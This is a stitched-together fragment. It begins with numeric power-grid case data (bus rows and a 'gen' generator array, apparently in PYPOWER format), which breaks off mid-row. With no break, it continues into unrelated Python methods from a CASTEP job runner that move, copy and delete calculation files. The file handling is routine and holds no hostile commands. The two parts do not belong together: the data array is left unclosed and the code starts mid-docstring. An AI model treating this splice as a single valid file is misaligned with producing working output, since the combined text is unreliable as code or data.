220.0, 0, 1.1, 0.9 ], [503, 1, 77.424891, 15.484978, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [504, 1, 50.701455, 10.140291, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [505, 1, 359.61406, 71.922812, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [506, 1, 112.878428, 22.575686, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [507, 1, 107.371273, 21.474255, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [508, 1, 156.094332, 31.218866, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [509, 1, 205.701368, 41.140274, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [510, 1, 129.953843, 25.990769, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [511, 1, 113.359454, 22.671891, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [512, 1, 74.880918, 14.976184, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [513, 1, 41.251395, 8.250279, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [514, 1, 102.670731, 20.534146, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [515, 1, 91.588391, 18.317678, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [516, 1, 102.465858, 20.493172, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [517, 1, 48.130667, 9.626133, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [518, 1, 271.074962, 54.214992, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [519, 1, 26.678739, 5.335748, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [520, 1, 107.712397, 21.542479, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [521, 1, 97.300872, 19.460174, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [522, 1, 83.309794, 16.661959, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [523, 1, 44.844715, 8.968943, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [524, 1, 130.161391, 26.032278, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [525, 1, 155.066304, 31.013261, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [526, 1, 47.013187, 9.402637, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [527, 1, 51.617176, 10.323435, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [528, 1, 112.659312, 22.531862, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [529, 1, 144.412556, 28.882511, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [530, 1, 61.196143, 12.239229, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [531, 1, 62.220308, 12.444062, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [532, 1, 59.72065, 11.94413, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [533, 1, 53.516909, 10.703382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [534, 1, 147.629584, 29.525917, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [535, 1, 184.822764, 36.964553, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [536, 1, 145.680168, 29.136034, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [537, 1, 48.461788, 9.692358, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [538, 1, 36.226727, 7.245345, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [539, 1, 38.438784, 7.687757, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [540, 1, 34.612437, 6.922487, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [541, 1, 89.406912, 17.881382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [542, 1, 122.817461, 24.563492, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [543, 1, 67.082293, 13.416459, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [544, 1, 124.941713, 24.988343, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [545, 1, 269.019999, 53.804, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [546, 1, 134.836886, 26.967377, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [547, 1, 174.285535, 34.857107, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [548, 1, 56.416949, 11.28339, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [549, 1, 48.241315, 9.648263, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [550, 1, 39.807289, 7.961458, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [551, 1, 38.373266, 7.674653, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [552, 1, 190.557317, 38.111463, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [553, 1, 1.318362, 0.263672, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [554, 1, 193.054456, 38.610891, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [555, 1, 73.555885, 14.711177, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [556, 1, 113.793402, 22.75868, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [557, 1, 241.770041, 48.354008, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [558, 1, 142.561806, 28.512361, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [559, 1, 76.297706, 15.259541, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [560, 1, 119.195067, 23.839013, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [561, 1, 65.363095, 13.072619, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [562, 1, 178.567079, 35.713416, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [563, 1, 125.547209, 25.109442, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [564, 1, 247.893314, 49.578663, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [565, 1, 187.047789, 37.409558, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [566, 1, 0.300439, 0.060088, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [567, 1, 304.054569, 60.810914, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [568, 1, 281.17691, 56.235382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [569, 1, 197.838049, 39.56761, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [570, 1, 308.86082, 61.772164, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [571, 1, 227.406839, 45.481368, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [572, 1, 401.107695, 80.221539, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [573, 1, 116.757191, 23.351438, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [574, 1, 222.467036, 44.493407, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [575, 1, 4.180555, 0.836111, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [576, 1, 270.518423, 54.103685, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [577, 1, 298.21836, 59.643672, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [578, 1, 284.728905, 56.945781, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [579, 1, 103.876875, 20.775375, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [580, 1, 21.62562, 4.325124, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [581, 1, 0.124263, 0.024853, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [582, 1, 78.241603, 15.648321, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [583, 1, 89.740243, 17.948049, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [584, 1, 51.488653, 10.297731, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [585, 1, 89.390638, 17.878128, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ] ]) ppc["gen"] = array([ [586, 272.0, 0, 9999, -9999, 1.0, 100, 1, 272.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [589, 63.1, 0, 9999, -9999, 1.0, 100, 1, 63.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [590, 38.0, 0, 9999, -9999, 1.0, 100, 1, 38.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [593, 11.1, 0, 9999, -9999, 1.0, 100, 1, 11.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [594, 19.0, 0, 9999, -9999, 1.0, 100, 1, 19.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [595, 1077.901512, 0, 9999, -9999, 1.0, 100, 1, 4730.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [597, 95.0, 0, 9999, -9999, 1.0, 100, 1, 95.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [598, 12.0, 0, 9999, -9999, 1.0, 100, 1, 12.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [599, 9.3, 0, 9999, -9999, 1.0, 100, 1, 9.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [600, 16.9, 0, 9999, -9999, 1.0, 100, 1, 16.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [601, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [602, 24.6, 0, 9999, -9999, 1.0, 100, 1, 24.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [603, 784.389663, 0, 9999, -9999, 1.0, 100, 1, 3455.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [607, 1800.0, 0, 9999, -9999, 1.0, 100, 1, 1800.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [608, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [609, 36.4, 0, 9999, -9999, 1.0, 100, 1, 36.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [610, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [611, 100.943054, 0, 9999, -9999, 1.0, 100, 1, 150.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [612, 30.0, 0, 9999, -9999, 1.0, 100, 1, 30.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [613, 85.0, 0, 9999, -9999, 1.0, 100, 1, 85.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [614, 30.0, 0, 9999, -9999, 1.0, 100, 1, 30.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [616, 29.0, 0, 9999, -9999, 1.0, 100, 1, 29.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [617, 137.0, 0, 9999, -9999, 1.0, 100, 1, 137.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [618, 33.4, 0, 9999, -9999, 1.0, 100, 1, 33.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [619, 118.0, 0, 9999, -9999, 1.0, 100, 1, 118.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [621, 765.0, 0, 9999, -9999, 1.0, 100, 1, 765.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [623, 760.0, 0, 9999, -9999, 1.0, 100, 1, 760.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [624, 27.0, 0, 9999, -9999, 1.0, 100, 1, 27.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [628, 449.0, 0, 9999, -9999, 1.0, 100, 1, 449.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [629, 75.3, 0, 9999, -9999, 1.0, 100, 1, 75.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [631, 79.8, 0, 9999, -9999, 1.0, 100, 1, 79.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [632, 45.1, 0, 9999, -9999, 1.0, 100, 1, 45.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [637, 53.7, 0, 9999, -9999, 1.0, 100, 1, 53.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [638, 128.7, 0, 9999, -9999, 1.0, 100, 1, 128.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [639, 15.8, 0, 9999, -9999, 1.0, 100, 1, 15.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [640, 12.0, 0, 9999, -9999, 1.0, 100, 1, 12.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [641, 12.6, 0, 9999, -9999, 1.0, 100, 1, 12.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [642, 28.9, 0, 9999, -9999, 1.0, 100, 1, 28.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [643, 857.0, 0, 9999, -9999, 1.0, 100, 1, 857.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [646, 103.0, 0, 9999, -9999, 1.0, 100, 1, 103.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [647, 14.0, 0, 9999, -9999, 1.0, 100, 1, 14.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [650, 1324.5, 0, 9999, -9999, 1.0, 100, 1, 1324.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [652, 46.9, 0, 9999, -9999, 1.0, 100, 1, 46.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [655, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [657, 38.0, 0, 9999, -9999, 1.0, 100, 1, 38.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [658, 95.0, 0, 9999, -9999, 1.0, 100, 1, 95.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [661, 32.7, 0, 9999, -9999, 1.0, 100, 1, 32.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [662, 9.2, 0, 9999, -9999, 1.0, 100, 1, 9.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [663, 15.0, 0, 9999, -9999, 1.0, 100, 1, 15.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [666, 28.9, 0, 9999, -9999, 1.0, 100, 1, 28.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [668, 766.0, 0, 9999, -9999, 1.0, 100, 1, 766.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [670, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [672, 33.1, 0, 9999, -9999, 1.0, 100, 1, 33.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [675, 10.6, 0, 9999, -9999, 1.0, 100, 1, 10.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [676, 370.0, 0, 9999, -9999, 1.0, 100, 1, 370.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [677, 13.4, 0, 9999, -9999, 1.0, 100, 1, 13.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [678, 1017.0, 0, 9999, -9999, 1.0, 100, 1, 1017.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [679, 544.843814, 0, 9999, -9999, 1.0, 100, 1, 695.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [681, 40.1, 0, 9999, -9999, 1.0, 100, 1, 40.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [683, 27.5, 0, 9999, -9999, 1.0, 100, 1, 27.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [685, 39.347387, 0, 9999, -9999, 1.0, 100, 1, 58.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [687, 1329.0, 0, 9999, -9999, 1.0, 100, 1, 1329.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [689, 310.0, 0, 9999, -9999, 1.0, 100, 1, 310.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [691, 26.0, 0, 9999, -9999, 1.0, 100, 1, 26.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [693, 194.0, 0, 9999, -9999, 1.0, 100, 1, 194.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [694, 16.4, 0, 9999, -9999, 1.0, 100, 1, 16.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [695, 14.7, 0, 9999, -9999, 1.0, 100, 1, 14.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [696, 721.0, 0, 9999, -9999, 1.0, 100, 1, 721.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [697, 11.6, 0, 9999, -9999, 1.0, 100, 1, 11.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [698, 24.0, 0, 9999, -9999, 1.0, 100, 1, 24.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [701, 47.2, 0, 9999, -9999, 1.0, 100, 1, 47.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [702, 73.4, 0, 9999, -9999, 1.0, 100, 1, 73.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [704, 508.0, 0, 9999, -9999, 1.0, 100, 1, 508.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [705, 17.0, 0, 9999, -9999, 1.0, 100, 1, 17.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [707, 34.0, 0, 9999, -9999, 1.0, 100, 1, 34.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [708, 7.8, 0, 9999, -9999, 1.0, 100, 1, 7.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [711, 107.131712, 0, 9999, -9999, 1.0, 100, 1, 176.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [713, 13.4, 0, 9999, -9999, 1.0, 100, 1, 13.4, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [714, 15.0, 0, 9999, -9999, 1.0, 100, 1, 15.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [716, 0.1, 0, 9999, -9999, 1.0, 100, 1, 0.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [717, 11.0, 0, 9999, -9999, 1.0, 100, 1, 11.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [719, 1332.487614, 0, 9999, -9999, 1.0, 100, 1, 1958.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [721, 4.0, 0, 9999, -9999, 1.0, 100, 1, 4.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [722, 20.7, 0, 9999, -9999, 1.0, 100, 1, 20.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [723, 19.7, 0, 9999, -9999, 1.0, 100, 1, 19.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [724, 12.1, 0, 9999, -9999, 1.0, 100, 1, 12.1, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [725, 800.0, 0, 9999, -9999, 1.0, 100, 1, 800.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [727, 61.5, 0, 9999, -9999, 1.0, 100, 1, 61.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [728, 510.0, 0, 9999, -9999, 1.0, 100, 1, 510.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [730, 633.2, 0, 9999, -9999, 1.0, 100, 1, 633.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [731, 771.665434, 0, 9999, -9999, 1.0, 100, 1, 895.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [732, 14.6, 0, 9999, -9999, 1.0, 100, 1, 14.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [733, 396.6, 0, 9999, -9999, 1.0, 100, 1, 396.6, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [735, 84.8, 0, 9999, -9999, 1.0, 100, 1, 84.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [737, 28.0, 0, 9999, -9999, 1.0, 100, 1, 28.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [738, 138.5, 0, 9999, -9999, 1.0, 100, 1, 138.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [739, 59.9, 0, 9999, -9999, 1.0, 100, 1, 59.9, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [741, 214.0, 0, 9999, -9999, 1.0, 100, 1, 214.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [742, 9.0, 0, 9999, -9999, 1.0, 100, 1, 9.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [743, 740.211485, 0, 9999, -9999, 1.0, 100, 1, 1410.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [745, 42.0, 0, 9999, -9999, 1.0, 100, 1, 42.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [746, 100.0, 0, 9999, -9999, 1.0, 100, 1, 100.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [747, 12.5, 0, 9999, -9999, 1.0, 100, 1, 12.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [748, 110.0, 0, 9999, -9999, 1.0, 100, 1, 110.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [749, 16.0, 0, 9999, -9999, 1.0, 100, 1, 16.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [750, 90.8, 0, 9999, -9999, 1.0, 100, 1, 90.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [753, 301.078058, 0, 9999, -9999, 1.0, 100, 1, 311.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [758, 18.5, 0, 9999, -9999, 1.0, 100, 1, 18.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [760, 337.515183, 0, 9999, -9999, 1.0, 100, 1, 794.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [761, 15.7, 0, 9999, -9999, 1.0, 100, 1, 15.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [762, 1105.0, 0, 9999, -9999, 1.0, 100, 1, 1105.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [763, 20.3, 0, 9999, -9999, 1.0, 100, 1, 20.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [765, 59.0, 0, 9999, -9999, 1.0, 100, 1, 59.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [767, 11.2, 0, 9999, -9999, 1.0, 100, 1, 11.2, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [769, 43.3, 0, 9999, -9999, 1.0, 100, 1, 43.3, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [771, 690.0, 0, 9999, -9999, 1.0, 100, 1, 690.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [772, 18.8, 0, 9999, -9999, 1.0, 100, 1, 18.8, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [774, 33.5, 0, 9999, -9999, 1.0, 100, 1, 33.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [776, 56.0, 0, 9999, -9999, 1.0, 100, 1, 56.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [777, 79.0, 0, 9999, -9999, 1.0, 100, 1, 79.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [778, 14.7, 0, 9999, -9999, 1.0, 100, 1, 14.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [781, 976.341466, 0, 9999, -9999, 1.0, 100, 1, 1310.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [784, 893.715747, 0, 9999, -9999, 1.0, 100, 1, 1275.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [785, 3.0, 0, 9999, -9999, 1.0, 100, 1, 3.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [787, 778.0, 0, 9999, -9999, 1.0, 100, 1, 778.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [788, 875.0, 0, 9999, -9999, 1.0, 100, 1, 875.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [789, 77.4, 0, 9999, -9999, 1.0, 100, 1, 77.4, 0.0, 0, 0, 0, 0, 0, 0, 0,
for structure. Keyword arguments: completed_dir (str): folder for completed jobs. keep (bool): whether to also move intermediate files. skip_existing (bool): if True, skip files that already exist, otherwise throw an error. """ completed_dir = self.root_folder + '/' + completed_dir LOG.info('Moving files to completed: {completed}'.format(completed=completed_dir)) if seed.endswith('.res'): seed = str(seed.replace('.res', '')) if not os.path.exists(completed_dir): os.makedirs(completed_dir, exist_ok=True) for _file in glob.glob(seed + '*_bak') + glob.glob(seed + '*.lock'): os.remove(_file) if keep: seed_files = glob.glob(seed + '.*') + glob.glob(seed + '-out.cell*') if seed_files: LOG.debug('Files to move: {files}.'.format(files=seed_files)) for _file in seed_files: if skip_existing and os.path.isfile(completed_dir + '/' + _file): LOG.warning('File already found {}...'.format(_file)) else: shutil.move(_file, completed_dir) else: # move castep/param/res/out_cell files to completed file_exts = ['.castep'] if self.kpts_1D: file_exts.append('.param') if not self.conv_kpt_bool and not self.conv_cutoff_bool: file_exts.append('.res') if os.path.isfile(seed + '-out.cell'): file_exts.append('-out.cell') if self.calc_doc.get('write_formatted_density'): file_exts.append('.den_fmt') for ext in file_exts: try: shutil.move('{}{}'.format(seed, ext), completed_dir) except Exception as exc: LOG.warning('Error moving files to completed: {error}'.format(error=exc)) # delete whatever is left wildcard_fnames = glob.glob(seed + '.*') wildcard_fnames += glob.glob(seed + '-out.*') for fname in wildcard_fnames: os.remove(fname) def cp_to_input(self, seed, ext='res', glob_files=False): """ Copy initial cell and res to input folder. Parameters: seed (str): filename of structure. Keyword arguments: ext (str): file extension for structure. glob_files (bool): whether to glob all related seed files. """ if not self._first_run: return input_dir = self.root_folder + '/input' LOG.debug('Copying file to input_dir: {input}'.format(input=input_dir)) if not os.path.exists(input_dir): os.makedirs(input_dir, exist_ok=True) if glob_files: files = glob.glob('{}.*'.format(seed)) LOG.debug('Files to copy: {files}'.format(files=files)) for f in files: if f.endswith('.lock'): continue if not os.path.isfile(input_dir + '/' + f): shutil.copy2('{}'.format(f), input_dir) else: LOG.debug('File to copy: {file}'.format(file='{}.{}'.format(seed, ext))) if os.path.isfile('{}.{}'.format(seed, ext)): if not os.path.isfile('{}/{}.{}'.format(input_dir, seed, ext)): 